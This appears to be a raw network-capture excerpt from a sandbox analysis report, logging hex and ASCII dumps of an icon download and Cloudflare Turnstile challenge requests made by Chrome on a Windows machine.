                                                                                                                                                                                    2024-01-26 13:41:40 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 08 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 e0 63 14 00 e5 82 43 00 fc f1 ea 00 e6 83 46 00 f6 d8 c4 00 e0 6a 20 00 fd f7 f3 00 f3 c1 a4 00 dd 57 03 00 e2 75 2f 00 e9 94 5e 00 de 5d 0c 00 f5 cc b3 00 e9 95 61 00 e4 7b 38 00 ef b3 8d 00 fb ea df 00 ea 9a 67 00 df 63 15 00 eb 9b 6a 00 e5 81 41 00 fc f0 e8 00
                                                                                                                                                                                    Data Ascii: ( @cCFj Wu/^]a{8gcjA
                                                                                                                                                                                    2024-01-26 13:41:40 UTC1369INData Raw: 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 8a 82 57 3e 0e 37 79 41 73 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 48 58 8f 44 44 44 44 44 44 29 79 3a 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 8a 11 3b 44 2c 17 41 62 0f 36 65 91 44 18 87 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 21 7d 35 43 93 72 72 72 72 72 72 80 09 44 81 07 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 40 0b 92 2f 72 72 72 72 72 72 72 72 72 7a 4a 44 2d 23 72 72 72 72 72 72 72 72 72 72 72 72 72 86 1c 1d 64 72 72 72 2b 1e 2b 72 72 72 72 72 06 46 44 79 72 72 72 72 72 72 72 72 72 72 72 72 72 34 33 89 86 72 72 2b 70 44 70 2b 72 72 72 72 72 0c 22 29 73 72 72 72 72 72 72 72 72 72 72 72 72 5f 44 13 72 72 2b 70 44 33 44 70
                                                                                                                                                                                    Data Ascii: rrrrrrrrrrrrrrrrrrrrrrrrrW>7yAsrrrrrrrrrrrrrrrrrrrrrrHXDDDDDD)y:rrrrrrrrrrrrrrrrrr;D,Ab6eDrrrrrrrrrrrrrrrrr!}5CrrrrrrDrrrrrrrrrrrrrrr@/rrrrrrrrrzJD-#rrrrrrrrrrrrrdrrr++rrrrrFDyrrrrrrrrrrrrr43rr+pDp+rrrrr")srrrrrrrrrrrr_Drr+pD3Dp
                                                                                                                                                                                    2024-01-26 13:41:40 UTC989INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    30192.168.2.1649762104.17.3.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:44 UTC742OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=84b92c841f99b127 HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:44 UTC335INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:44 GMT
                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92cd95da64531-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:44 UTC1034INData Raw: 37 65 36 30 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 61 2c 66 77 2c 66 78 2c 66 42 2c 66 43 2c 66 44 2c 66 4e 2c 66 52 2c 66 53 2c 66 57 2c 66 58 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 65 2c 68 73 2c 68 46 2c 68 4b 2c 68 4c 2c 68 56 2c 69 34 2c
                                                                                                                                                                                    Data Ascii: 7e60window._cf_chl_opt.uaO=false;~function(ia,fw,fx,fB,fC,fD,fN,fR,fS,fW,fX,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,he,hs,hF,hK,hL,hV,i4,
                                                                                                                                                                                    2024-01-26 13:41:44 UTC1369INData Raw: 27 74 79 4b 6d 76 27 3a 69 50 28 31 32 34 35 29 2c 27 61 75 6d 5a 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 57 68 74 52 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 54 51 4b 4f 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 52 71 45 4a 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 6e 53 7a 57 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 58 75 4e 6a 4e 27 3a 69 50 28 31 30 32 35 29 2c 27 52 57 63 45 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 78 47 49 7a 45 27 3a 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                    Data Ascii: 'tyKmv':iP(1245),'aumZy':function(h,i){return h&i},'WhtRF':function(h,i){return h==i},'TQKOU':function(h,i){return h<i},'RqEJj':function(h,i){return h+i},'nSzWe':function(h,i){return h>i},'XuNjN':iP(1025),'RWcEy':function(h,i){return h-i},'xGIzE':function
                                                                                                                                                                                    2024-01-26 13:41:44 UTC1369INData Raw: 79 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 50 7c 4f 7d 2c 27 4b 79 75 6f 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 69 53 29 7b 72 65 74 75 72 6e 20 69 53 3d 62 2c 64 5b 69 53 28 31 30 34 37 29 5d 28 4f 2c 50 29 7d 2c 27 58 43 68 70 66 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 21 3d 50 7d 2c 27 46 47 48 78 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 29 7b 72 65 74 75 72 6e 20 4f 28 29 7d 7d 2c 64 5b 69 54 28 31 31 35 33 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27 27 2c 45 3d 32 2c 46 3d 33 2c 47 3d 32 2c 48 3d 5b 5d 2c 49 3d 30 2c 4a 3d 30 2c 4b 3d 30 3b 64 5b 69 54 28 38 39 36 29 5d 28 4b 2c 69 5b 69 54 28 31 35 35 31 29 5d 29
                                                                                                                                                                                    Data Ascii: yn':function(O,P){return P|O},'KyuoN':function(O,P,iS){return iS=b,d[iS(1047)](O,P)},'XChpf':function(O,P){return O!=P},'FGHxn':function(O){return O()}},d[iT(1153)](null,i))return'';for(B={},C={},D='',E=2,F=3,G=2,H=[],I=0,J=0,K=0;d[iT(896)](K,i[iT(1551)])
                                                                                                                                                                                    2024-01-26 13:41:44 UTC1369INData Raw: 31 35 35 32 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 54 28 36 31 39 29 5d 28 30 29 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 49 3c 3c 31 2e 34 31 7c 64 5b 69 54 28 31 30 34 37 29 5d 28 4e 2c 31 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 69 54 28 31 35 35 32 29 5d 28 64 5b 69 54 28 31 31 34 37 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 69 54 28 31 31 35 33 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 69 54 28 31 34 31 37 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 7b 69 66 28 73 5b 69 54 28 32 30 34 37 29 5d 28 69 5b 69 54 28 39 35 39 29 5d 2c 34 29 29 72 65 74 75 72 6e 3b 69 66
                                                                                                                                                                                    Data Ascii: 1552)](o(I)),I=0):J++,N=0,x++);for(N=D[iT(619)](0),x=0;16>x;I=I<<1.41|d[iT(1047)](N,1),j-1==J?(J=0,H[iT(1552)](d[iT(1147)](o,I)),I=0):J++,N>>=1,x++);}E--,d[iT(1153)](0,E)&&(E=Math[iT(1417)](2,G),G++),delete C[D]}else{if(s[iT(2047)](i[iT(959)],4))return;if
                                                                                                                                                                                    2024-01-26 13:41:44 UTC1369INData Raw: 28 5b 64 5b 69 54 28 31 32 33 33 29 5d 5d 2c 53 29 29 2c 55 3d 6e 65 77 20 53 28 54 29 2c 6a 5b 69 54 28 31 33 32 30 29 5d 28 54 29 2c 55 5b 69 54 28 32 30 32 30 29 5d 28 29 7d 66 6f 72 28 4e 3d 32 2c 78 3d 30 3b 78 3c 47 3b 49 3d 4e 26 31 2e 38 37 7c 49 3c 3c 31 2e 31 35 2c 64 5b 69 54 28 35 38 34 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 54 28 31 35 35 32 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 49 3c 3c 3d 31 2c 64 5b 69 54 28 31 32 30 34 29 5d 28 4a 2c 6a 2d 31 29 29 7b 48 5b 69 54 28 31 35 35 32 29 5d 28 64 5b 69 54 28 31 31 34 37 29 5d 28 6f 2c 49 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 69 54 28 33 36 36 29 5d 28 27 27 29
                                                                                                                                                                                    Data Ascii: ([d[iT(1233)]],S)),U=new S(T),j[iT(1320)](T),U[iT(2020)]()}for(N=2,x=0;x<G;I=N&1.87|I<<1.15,d[iT(584)](J,j-1)?(J=0,H[iT(1552)](o(I)),I=0):J++,N>>=1,x++);for(;;)if(I<<=1,d[iT(1204)](J,j-1)){H[iT(1552)](d[iT(1147)](o,I));break}else J++;return H[iT(366)]('')
                                                                                                                                                                                    2024-01-26 13:41:44 UTC1369INData Raw: 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 64 5b 69 57 28 31 32 30 31 29 5d 28 65 2c 4a 29 2c 4f 3d 64 5b 69 57 28 39 36 33 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 57 28 31 34 31 37 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 64 5b 69 57 28 31 30 34 37 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 57 28 31 38 32 35 29 5d 28 30 3c 4e 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4f 3d 64 5b 69 57 28 39 33 32 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65
                                                                                                                                                                                    Data Ascii: I++)),J|=(0<N?1:0)*F,F<<=1);s[B++]=d[iW(1201)](e,J),O=d[iW(963)](B,1),x--;break;case 1:for(J=0,K=Math[iW(1417)](2,16),F=1;K!=F;N=d[iW(1047)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=d[iW(1825)](0<N?1:0,F),F<<=1);s[B++]=e(J),O=d[iW(932)](B,1),x--;break;case 2:re
                                                                                                                                                                                    2024-01-26 13:41:44 UTC1369INData Raw: 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 77 3d 77 5b 6a 30 28 31 32 30 32 29 5d 5b 6a 30 28 31 36 31 39 29 5d 28 77 29 2c 78 3d 30 3b 6f 5b 6a 30 28 39 36 39 29 5d 28 78 2c 76 5b 6a 30 28 31 35 35 31 29 5d 29 3b 78 2b 2b 29 69 66 28 6f 5b 6a 30 28 31 38 35 39 29 5d 28 6f 5b 6a 30 28 34 37 35 29 5d 2c 6a 30 28 34 39 38 29 29 29 72 65 74 75 72 6e 20 6f 5b 6a 30 28 31 30 32 36 29 5d 28 6e 75 6c 6c 2c 42 29 3f 27 27 3a 27 27 3d 3d 69 3f 6e 75 6c 6c 3a 6a 2e 69 28 73 5b 6a 30 28 31 35 35 31 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 6a 33 29 7b 72 65 74 75 72 6e 20 6a 33 3d 6a 30 2c 43 5b 6a 33 28 36 31 39 29 5d 28 46 29 7d 29 3b 65 6c 73 65 28 42 3d 76 5b 78 5d 2c 43 3d 66 46 28 64 2c 66 2c 42 29 2c 77 28 43 29 29 3f 28 44 3d 43
                                                                                                                                                                                    Data Ascii: sAaAb'.split('A'),w=w[j0(1202)][j0(1619)](w),x=0;o[j0(969)](x,v[j0(1551)]);x++)if(o[j0(1859)](o[j0(475)],j0(498)))return o[j0(1026)](null,B)?'':''==i?null:j.i(s[j0(1551)],32768,function(F,j3){return j3=j0,C[j3(619)](F)});else(B=v[x],C=fF(d,f,B),w(C))?(D=C
                                                                                                                                                                                    2024-01-26 13:41:44 UTC1369INData Raw: 73 2e 68 5b 74 68 69 73 2e 67 5e 32 35 33 5d 5b 33 5d 2c 68 5b 6a 48 28 31 36 35 33 29 5d 28 68 5b 6a 48 28 31 31 31 33 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 35 33 5d 5b 31 5d 5b 6a 48 28 36 31 39 29 5d 28 74 68 69 73 2e 68 5b 68 5b 6a 48 28 33 32 30 29 5d 28 32 35 33 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2c 37 35 29 2c 32 35 36 29 26 32 35 35 2e 37 32 29 2c 35 31 29 2c 77 3d 68 5b 6a 48 28 33 32 30 29 5d 28 74 68 69 73 2e 68 5b 32 35 33 5e 74 68 69 73 2e 67 5d 5b 33 5d 5e 68 5b 6a 48 28 33 36 33 29 5d 28 74 68 69 73 2e 68 5b 32 35 33 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 6a 48 28 36 31 39 29 5d 28 74 68 69 73 2e 68 5b 68 5b 6a 48 28 35 39 35 29 5d 28 32 35 33 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2c 37 35 29 2b 32 35 36 26 32
                                                                                                                                                                                    Data Ascii: s.h[this.g^253][3],h[jH(1653)](h[jH(1113)](this.h[this.g^253][1][jH(619)](this.h[h[jH(320)](253,this.g)][0]++),75),256)&255.72),51),w=h[jH(320)](this.h[253^this.g][3]^h[jH(363)](this.h[253^this.g][1][jH(619)](this.h[h[jH(595)](253,this.g)][0]++),75)+256&2
                                                                                                                                                                                    2024-01-26 13:41:44 UTC1369INData Raw: 37 38 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6b 64 2c 68 29 7b 6b 64 3d 6b 63 2c 68 3d 7b 27 50 46 42 41 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 29 7b 72 65 74 75 72 6e 20 69 28 6a 29 7d 7d 2c 66 77 5b 6b 64 28 33 32 32 29 5d 26 26 28 65 5b 6b 64 28 32 30 31 36 29 5d 28 65 5b 6b 64 28 37 39 38 29 5d 2c 65 5b 6b 64 28 37 39 38 29 5d 29 3f 28 66 5b 6b 64 28 32 30 38 39 29 5d 5b 6b 64 28 32 30 32 39 29 5d 3d 27 63 27 2c 67 28 66 75 6e 63 74 69 6f 6e 28 6b 65 29 7b 6b 65 3d 6b 64 2c 68 5b 6b 65 28 33 33 39 29 5d 28 69 2c 7b 7d 29 7d 2c 30 29 29 3a 28 66 77 5b 6b 64 28 37 39 33 29 5d 5b 6b 64 28 31 39 33 36 29 5d 28 29 2c 66 77 5b 6b 64 28 37 39 33 29 5d 5b 6b 64 28 36 33 37 29 5d 28 29 2c 66 77 5b 6b 64 28 38 39 34 29 5d 3d 21 21 5b 5d 2c 66 77 5b 6b 64
                                                                                                                                                                                    Data Ascii: 782)](function(kd,h){kd=kc,h={'PFBAl':function(i,j){return i(j)}},fw[kd(322)]&&(e[kd(2016)](e[kd(798)],e[kd(798)])?(f[kd(2089)][kd(2029)]='c',g(function(ke){ke=kd,h[ke(339)](i,{})},0)):(fw[kd(793)][kd(1936)](),fw[kd(793)][kd(637)](),fw[kd(894)]=!![],fw[kd
                                                                                                                                                                                    2024-01-26 13:41:44 UTC1369INData Raw: 5b 6b 67 28 32 31 35 38 29 5d 3d 6b 67 28 31 32 34 31 29 2c 69 5b 6b 67 28 31 34 31 38 29 5d 3d 6b 67 28 31 33 39 39 29 2c 69 5b 6b 67 28 31 39 37 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3e 6f 7d 2c 69 5b 6b 67 28 31 38 33 38 29 5d 3d 6b 67 28 31 37 36 36 29 2c 69 5b 6b 67 28 31 32 30 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 69 5b 6b 67 28 31 34 36 38 29 5d 3d 6b 67 28 33 30 39 29 2c 69 5b 6b 67 28 31 34 34 34 29 5d 3d 6b 67 28 31 33 31 32 29 2c 69 5b 6b 67 28 37 35 34 29 5d 3d 6b 67 28 31 36 31 33 29 2c 6a 3d 69 2c 6b 3d 64 5b 6b 67 28 32 30 31 34 29 5d 28 29 2c 6c 3d 6a 5b 6b 67 28 31 34 31 38 29 5d 2c 6a 5b 6b 67 28 31 39 37 36 29 5d 28 6b 5b 6b 67 28 31 37 30 33 29
                                                                                                                                                                                    Data Ascii: [kg(2158)]=kg(1241),i[kg(1418)]=kg(1399),i[kg(1976)]=function(n,o){return n>o},i[kg(1838)]=kg(1766),i[kg(1200)]=function(n,o){return n+o},i[kg(1468)]=kg(309),i[kg(1444)]=kg(1312),i[kg(754)]=kg(1613),j=i,k=d[kg(2014)](),l=j[kg(1418)],j[kg(1976)](k[kg(1703)


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    31192.168.2.1649764104.17.3.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:47 UTC916OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/665851253:1706274618:ee7eBQ0fH6Ey9MEbinbSg9TNLutSYhmnKDUTs70R0JE/84b92c841f99b127/bd4b5c1cf495e39 HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 29929
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    CF-Challenge: bd4b5c1cf495e39
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normal
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:47 UTC16384OUTData Raw: 76 5f 38 34 62 39 32 63 38 34 31 66 39 39 62 31 32 37 3d 73 2d 75 68 38 6e 51 4b 77 42 75 62 39 59 4d 44 6b 51 6b 31 75 30 6b 30 6b 6b 51 76 30 68 66 68 59 39 30 57 30 77 68 73 34 2d 6e 32 75 30 73 6e 30 6b 2d 51 66 30 71 68 51 2d 51 69 30 44 6b 68 71 2d 51 24 71 62 4a 30 51 35 79 30 79 59 30 66 5a 4d 68 68 4a 30 6b 6d 6d 51 6c 30 6b 75 30 64 30 31 61 6d 30 74 30 6a 39 58 44 30 42 77 30 33 30 74 71 75 30 43 41 78 68 51 5a 51 68 6e 59 2d 30 50 45 4b 30 5a 31 31 42 25 32 62 6d 30 52 66 30 30 52 30 69 48 31 30 6e 2d 30 42 66 74 6b 2b 69 77 6e 71 68 44 36 6c 36 6c 37 4d 58 79 61 30 51 75 6e 6c 78 35 37 75 50 71 75 30 7a 39 5a 4b 62 64 63 71 6e 75 39 30 75 34 31 30 66 50 2d 30 79 4e 56 50 30 31 76 44 30 43 42 71 6d 6e 57 76 43 54 6e 6a 53 49 73 6c 4f 5a 42 30
                                                                                                                                                                                    Data Ascii: v_84b92c841f99b127=s-uh8nQKwBub9YMDkQk1u0k0kkQv0hfhY90W0whs4-n2u0sn0k-Qf0qhQ-Qi0Dkhq-Q$qbJ0Q5y0yY0fZMhhJ0kmmQl0ku0d01am0t0j9XD0Bw030tqu0CAxhQZQhnY-0PEK0Z11B%2bm0Rf00R0iH10n-0Bftk+iwnqhD6l6l7MXya0Qunlx57uPqu0z9ZKbdcqnu90u410fP-0yNVP01vD0CBqmnWvCTnjSIslOZB0
                                                                                                                                                                                    2024-01-26 13:41:47 UTC13545OUTData Raw: 57 51 33 63 74 65 73 77 24 45 6e 30 6a 68 44 75 51 4e 30 5a 30 44 30 62 4d 42 59 30 4f 4d 51 49 6a 59 30 78 6d 73 30 62 38 4a 78 30 4f 30 73 2d 30 68 30 68 68 79 41 44 66 30 67 68 44 65 2b 31 30 31 68 51 77 30 52 30 5a 68 42 69 44 79 30 76 68 42 39 30 52 30 55 68 6e 30 6e 49 30 54 68 31 58 64 4c 30 35 59 74 6e 51 6f 63 4b 39 73 30 6e 53 63 66 30 31 68 44 77 30 45 67 7a 77 51 69 6e 6b 68 6a 7a 51 61 30 57 45 73 45 44 46 68 41 30 79 34 24 68 51 62 30 6b 68 6e 52 30 4a 68 62 58 2b 7a 30 6e 68 6a 77 30 42 39 4a 68 73 45 6e 2d 30 37 6c 66 7a 51 77 30 54 63 35 75 30 46 30 2b 30 30 68 42 36 30 49 68 42 30 51 70 6d 57 30 4a 39 44 49 30 54 30 42 68 42 6b 30 48 68 74 57 30 68 30 41 68 44 77 30 4f 30 55 59 6e 68 51 69 30 5a 68 6a 77 30 4d 6d 5a 68 51 30 51 6f 63 41
                                                                                                                                                                                    Data Ascii: WQ3ctesw$En0jhDuQN0Z0D0bMBY0OMQIjY0xms0b8Jx0O0s-0h0hhyADf0ghDe+101hQw0R0ZhBiDy0vhB90R0Uhn0nI0Th1XdL05YtnQocK9s0nScf01hDw0EgzwQinkhjzQa0WEsEDFhA0y4$hQb0khnR0JhbX+z0nhjw0B9JhsEn-07lfzQw0Tc5u0F0+00hB60IhB0QpmW0J9DI0T0BhBk0HhtW0h0AhDw0O0UYnhQi0Zhjw0MmZhQ0QocA
                                                                                                                                                                                    2024-01-26 13:41:47 UTC1307INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:47 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cf-chl-out: /f+3UzaFdvwogWXGUWz1ZzAnmEq+7uYT4lks4KhsRKeUYjSO5qWNWyTLfqbqUtnW1PDvUB8gLkMU5nHXVuIDCvEmZShXyDK8cBKcPTqNYO2grboOhGWOPC54amIDoE0k$3yw3XU3/KI+mq1gdKcHgtQ==
